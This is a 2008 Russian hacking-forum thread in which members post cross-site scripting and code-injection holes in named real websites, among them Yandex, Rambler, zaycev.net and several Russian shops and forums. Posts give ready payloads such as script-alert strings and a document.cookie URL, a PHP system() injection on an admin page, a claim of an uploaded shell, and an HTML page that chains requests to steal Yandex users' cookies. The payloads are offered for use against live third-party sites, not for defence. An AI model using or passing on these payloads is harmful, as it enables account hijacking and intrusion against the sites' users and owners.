Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    _http://asto.ru/eng/admin/sotrud.php
    пишем <?system(id)?>
    и видим
     
    3 people like this.
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    // offtop

    l1ght, foopi, зяблик
    залил шелл..

    смотрим..
     
    #262 sabe, 18 Nov 2008
    Last edited: 19 Nov 2008
    2 people like this.
  3. зяблик

    зяблик New Member

    Joined:
    28 Oct 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    foopi, l1ght, sabe Благодарю, чесно от души. Спасибо. За мной не заржавеет. Чем смогу тем помогу.
     
    1 person likes this.
  4. зяблик

    зяблик New Member

    Joined:
    28 Oct 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    foopi, l1ght, sabe не сочтите конечно за наглость или необразованность скорее все вместе:) подскажите какую литературу надо учить. ? Есть желание, возможности и время. А с чего начать?
     
    1 person likes this.
  5. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    video.antichat.ru
     
  6. зяблик

    зяблик New Member

    Joined:
    28 Oct 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    это все хорошо:) но команды языки ?, я вот в этом деле новенький, понимаешь вот как говорил, есть желание. Но а в подробностях, это все узнать как . Ксати там есть уже результат можете глянуть:))
     
  7. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    для начала научись пользоваться мозгом и дуй в другой раздел, здесь идет обсуждение совсем других вопросов.
     
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    например можеш освоить sql inject
    http://forum.antichat.ru/thread43966.html
    http://forum.antichat.ru/thread19844.html

    по возникшим вопросам сюда..
    http://forum.antichat.ru/lastpostinthread46016.html
     
    1 person likes this.
  9. dfgrd

    dfgrd Banned

    Joined:
    12 Feb 2008
    Messages:
    37
    Likes Received:
    52
    Reputations:
    1
    http://sacredangelro.com/svn/
    в чате <script>alert(XSS)</script> в теме сообщения
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    liter.kz
    Code:
    zaycev.net
    В обоих уязвимо поле поиска.
    Код:
    Code:
    '><script>alert('xss')</script>
     
  11. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    это не активка, это пассивка, смотрим внимательно
     
  12. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    RAMBLER.RU

    http://id-planet.rambler.ru/other/education/add

    Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"
     
    1 person likes this.
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://www.ecco-shoes.ru/rsm/gallery/

    там слева поля для поиска - 5 штук.

    Имя
    Фамилия
    Электронная почта

    Город
    Ключевое слово


    Во всех XSS:)))))))))

    "><script>alert('ГОЛО_СУЕМ')</script>
     
    #273 Pashkela, 25 Nov 2008
    Last edited: 25 Nov 2008
    1 person likes this.
  14. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    yandex.ru

    http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E%26login
     
  15. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    не работает :mad:

    оперативно залатали :confused:
     
    #275 chekist, 25 Nov 2008
    Last edited: 27 Nov 2008
    1 person likes this.
  16. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Яндекс.

    На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
    Что нам нужно сделать, чтобы поиметь чужие куки:
    • "Насильно" включить юзеру запись истории
    • Послать яндексу ядовитый поисковый запрос
    • Направить юзера на зараженную страницу истории запросов
    Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
    Кодес:
    Code:
    <html>
    <body onload="location.href='http://nahodki.yandex.ru/';">
    <img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
    <img src="http://yandex.ru/yandsearch?clid=14585&text=[COLOR=Yellow][B]тут_наш_злобнокодес[/B][/COLOR]">
    </body>
    </html>
     
    3 people like this.
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339

    Code:
    <html> 
    <head> 
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
    <title>Миракаль</title> 
    </head> 
    <frameset rows="30,30,30" cols="*"> 
    <frame src="http://rambler.ru" name="rambler" scrolling="no" noresize> 
    <frame src="http://yandex.ru" name="yandex" scrolling="no" noresize> 
    <frame src="http://google.ru" name="google" scrolling="no" noresize> 
    </frameset> 
    </html> 
    
    
     
    #277 Pashkela, 11 Dec 2008
    Last edited: 11 Dec 2008
  18. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    otake.ru

    В "псто" вставляем какбэ картинку:
    Code:
    javascript:eval(String.fromCharCode.....)
    только для риальне воене!!!1
     
    8 people like this.
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    пример:
    Code:
    http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
    хсска в логине.
     
    _________________________
    1 person likes this.
  20. Kolja

    Kolja New Member

    Joined:
    17 Dec 2008
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    http://www.schoolport.ru/

    В форуме, при создании темы, уязвимы все поля...

    В принципе он съедает любой джава код, так что писать что я туды закидывал не надо...